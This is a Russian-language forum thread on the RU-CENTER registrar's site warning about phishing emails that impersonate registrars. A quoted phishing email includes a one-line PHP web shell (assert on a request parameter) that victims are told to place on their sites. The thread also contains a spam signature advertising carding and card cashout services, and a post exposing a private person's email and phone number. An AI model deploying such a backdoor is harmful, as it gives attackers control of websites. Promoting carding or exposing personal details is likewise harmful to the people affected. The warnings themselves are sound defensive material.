Вернуться RU-CENTER: Форум > Сервисы регистрации, поддержки и продажи доменов > Регистрация доменов > Домены RU, SU, РФ
 
Опции темы Опции просмотра
Старый 23.03.2017, 15:23   #1
Станислав Муравьев
Служба поддержки
 
Аватар для Станислав Муравьев
 
Регистрация: 11.03.2009
Сообщений: 1,441
Мошеннические письма от имени RU-CENTER и других регистраторов

Уважаемые клиенты!

В последнее время участились случаи рассылки мошеннических писем якобы от имени RU-CENTER и других регистраторов с требованиями о размещении файлов и проведении каких-либо незапланированных "срочных" оплат.

RU-CENTER (впрочем, как и иные регистраторы) не требует размещения исполнимых файлов на сайтах.

Процедура верификации домена путём размещения исполнимого (!) файла не производится в принципе никогда.

Стоимость всех услуг описана на нашем официальном сайте https://nic.ru и никаких дополнительных требований по оплате услуг, помимо описанных на сайте и предусмотренных условиями договора об оказании услуг, по электронной почте с нашей стороны не запрашивается.

Таким образом, описанные в письмах действия не требуется выполнять.

В таких письмах в качестве обратного адреса зачастую указывается адрес в домене @nic.ru, однако поля From и Reply-To письма легко подделываются, поэтому информация в данных полях не является достоверной.

Вы можете увидеть, с какого на самом деле сервера было отправлено письмо, просмотрев заголовки Received письма.

Будьте бдительны! В случае малейших подозрений обращайтесь, пожалуйста, в техподдержку.
Станислав Муравьев вне форума  
Старый 22.05.2017, 13:07   #2
AlexeyK
 
Регистрация: 22.05.2017
Сообщений: 1
пришло письмо сегодня.


Уважаемый клиент!

В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменным именем хххххх.ru осуществляется лицом, указанным в качестве его администратора.

Чтобы подтвердить, что Вы имеете возможность управлять доменом, создайте в корневой директории сайта файл a12sy5pggqcdahq2.php со следующим содержимым:

<?php
assert(stripslashes($_REQUEST[RUCENTER]));
?>

Файл должен быть создан в течение трех календарных дней с момента получения настоящего письма и находиться на сервере до 16 июня 2017 года, 16:00 (UTC+03:00), в противном случае процедура активации не будет пройдена.

Уведомляем Вас о том, что если процедура подтверждения не будет пройдена, делегирование домена будет приостановлено.
----


Из этой же серии ?
AlexeyK вне форума  
Старый 22.05.2017, 13:17   #3
Станислав Муравьев
Служба поддержки
 
Аватар для Станислав Муравьев
 
Регистрация: 11.03.2009
Сообщений: 1,441
Конечно. Такое письмо следует игнорировать.
Станислав Муравьев вне форума  
Старый 22.05.2017, 16:43   #4
Olle256
 
Регистрация: 22.05.2017
Сообщений: 1
И меня не забыли, прислали такой текст. Видимо, рассылку сделали сегодня.
Olle256 вне форума  
Старый 22.05.2017, 17:42   #5
master17
 
Регистрация: 22.05.2017
Сообщений: 1
Цитата:
Сообщение от AlexeyK Посмотреть сообщение
<?php
assert(stripslashes($_REQUEST[RUCENTER]));
?>
Попался на этот развод. В течение нескольких часов висел этот файл в корне сайта. Чем это может грозить?
master17 вне форума  
Старый 22.05.2017, 18:15   #6
Станислав Муравьев
Служба поддержки
 
Аватар для Станислав Муравьев
 
Регистрация: 11.03.2009
Сообщений: 1,441
Рекомендуем Вам проверить файлы Вашего сайта на наличие постороннего кода, посторонних файлов.
Станислав Муравьев вне форума  
Старый 23.05.2017, 20:36   #7
tkdspb
 
Регистрация: 23.05.2017
Сообщений: 2
Первое письмо пришло оттуда:
Received: from arweb03.webasyst.net ([149.202.219.72]:36694 helo=hosting.webasyst.net)
by mx179.mail.ru with esmtp (envelope-from <denasmag@hosting.webasyst.net>)
В ловушку попался этот чел:
vanikulin@rambler.ru
Его домены:
1-DETSKIY.RU Vadim A Nikulin 27/10/2009 27/10/2010 RU-CENTER-REG-RIPN
TOPCOURIER.RU Vadim A Nikulin 24/11/2008 24/11/2010 RUCENTER-REG-RIPN
YARPROBKI.RU Private Person 30/01/2009 30/01/2011 RU-CENTER-REG-RIPN
Телефон: +79109777247
tkdspb вне форума  
Старый 23.05.2017, 20:37   #8
tkdspb
 
Регистрация: 23.05.2017
Сообщений: 2
Именно от него пришло это милое сообщение:
Уважаемый клиент!

Ваш домен успешно активирован.

Поскольку возможность управления доменом уже подтверждена, файл a1rh8xi29859i69m.php должен быть удален.
tkdspb вне форума  
Старый 25.05.2017, 12:26   #9
lord1952
 
Регистрация: 25.05.2017
Сообщений: 1
хорошая статья!
__________________
http://black-bay.ru]Кардинг форум
http://black-bay.ru]Работа дропом
http://black-bay.ru]Залив на банковскую карту
http://black-bay.ru]Карженая техника
http://black-bay.ru]Обнал банковских карт
lord1952 вне форума  
Старый 25.05.2017, 14:08   #10
Vdeg
 
Регистрация: 28.05.2010
Сообщений: 129
Мне таких писем не приходило.
__________________
Житель района Восточное Дегунино (Москва, Россия)
Vdeg вне форума  
Старый 26.05.2017, 03:43   #11
Pikado.Ru
 
Аватар для Pikado.Ru
 
Регистрация: 29.07.2015
Адрес: Russian Federation, Moscow
Сообщений: 62
Вчера посыпались письма с этим кодом и на домены, зарегистрированные в R01
__________________
С уважением, Pikado.Ru
Pikado.Ru вне форума  
Старый 26.05.2017, 15:24   #12
vnik
 
Регистрация: 26.05.2017
Сообщений: 3
Добрый день.
Я - Вадим Никулин, мне действительно принадлежат эти домены. Мне написал несколько писем человек, у которого упал сайт, а он решил, что это были какие-то действия с моей стороны.
Я начал смотреть, как так получилось, что от моего имени приходят письма. Мне удалось выяснить, что уже достаточно давно, в 2013 году кто-то разместил на моём хостинге php-файл, с помощью которого производил рассылки. Т. к. в апаче был указан адрес администратора - vanikulin at rambler dot ru , то получается, что письма как бы шли от меня.
К сожалению, я за этим сервером слежу очень плохо, и это привело к таким результатам. В самое ближайшее время я его обновлю и постараюсь предотвратить подобные ситуации.
Прямо сейчас я убрал тот php-файл и каждый день смотрю логи на предмет появления новых.
Для информации прикладываю архив с логами: https://yadi.sk/d/OsoM6C603JYjrt . Видно, что запросы шли из tor.
Если я могу чем-то ещё помочь, пожалуйста, обращайтесь.

С уважением, Вадим.
vnik вне форума  
Старый 26.05.2017, 15:29   #13
vnik
 
Регистрация: 26.05.2017
Сообщений: 3
Чтобы не было разночтений. Здесь, судя по всему, описываются сразу несколько проблем. То письмо, которое мне переслал тот человек, в нем было написано про "такой-то файл можно удалить". Я не очень понимаю смысл этого письма, это не совсем та проблема, которая описывается топикстартером.
Ещё раз подчёркиваю, что я со своей стороны предпринял меры для того, чтобы с моего сервера такие рассылки больше не повторялись.
vnik вне форума  
Старый 26.05.2017, 17:08   #14
vnik
 
Регистрация: 26.05.2017
Сообщений: 3
Сейчас посмотрел свою почту на предмет похожих писем и обнаружил, что мне приходило такое же письмо с просьбой разместить файл в корне. Вот заголовки того письма:

Return-Path: <nzsq3v0rh12t2mdsvc49rmnsyhn@vmailn.ru>
Received: from mx11.mail.rambler.ru ([10.5.5.21] verified)
by mail1008.rambler.ru (RamblerMail 6.1 SMTP 6.1a7)
with ESMTP id 15540969 for vanikulin@rambler.ru; Wed, 21 Dec 2016 12:46:43 +0300
Received: from vmailn.ru (vmailn.ru [185.118.164.207])
by mx11.mail.rambler.ru (Postfix) with ESMTP id 291728802B8
for <vanikulin@rambler.ru>; Wed, 21 Dec 2016 12:46:43 +0300 (MSK)
Received: from vmailn.ru (vmailn.ru [185.118.164.207])
by rayushkin1.mail.rambler.ru (resmtp/Rambler) with ESMTP id jh28Xmxm;
Wed, 21 Dec 2016 12:46:23 +0300
DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=vmailn.ru; s=mail;
h=Content-Type:MIME-Versionate:Subject:To:From:Reply-To:Message-ID; bh=7ccet10aNh7z0qa9D9B6hf8eI7b2YTu70fBux8l66W8=;
b=D6RbG76TgZvbUtKo4YIAjJ4zi95FZDyl90d/+CkH+6q5peZsDwQttvbHD5YbhsI7JIxKGGbHrDSig4hyG8daQi mkgVTqiZCoZk4bpETw9iPWLgFm3cUkPuZsQGVaqL2M27CDets6 vilAPJiFlChE1Yl7u9GQcnYxu15IwX8YBUQ=;
Received: by vmailn.ru with esmtpa (Exim 4.80)
id 1cJdRx-0005oY-KB; Wed, 21 Dec 2016 09:44:42 +0000
Message-ID: <0FF5BC10EF3B15D60A0F46FB4F902CB4@vmailn.ru>
Reply-To: "RU-CENTER" <nzsq3v0rh12t2mdsvc49rmnsyhn@vmailn.ru>
From: "RU-CENTER" <nzsq3v0rh12t2mdsvc49rmnsyhn@vmailn.ru>
To: "vanikulin@rambler.ru" <vanikulin@rambler.ru>
Subject: =?utf-8?B?0JTQvtC80LXQvSAxLWRldHNraXkucnUg0YPRgdC/0LXR?=
=?utf-8?B?iNC90L4g0LDQutGC0LjQstC40YDQvtCy0LDQvQ==?=
Date: Wed, 21 Dec 2016 12:44:26 +0300
Organization: RU-CENTER
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="8e69dfd628e19269ee80c3f946ee"
vnik вне форума  

Опции темы
Опции просмотра


© Региональный Сетевой Информационный Центр, 2008—2017
При использовании материалов указание источника «Форум RU-CENTER» и ссылка на http://forum.nic.ru обязательны.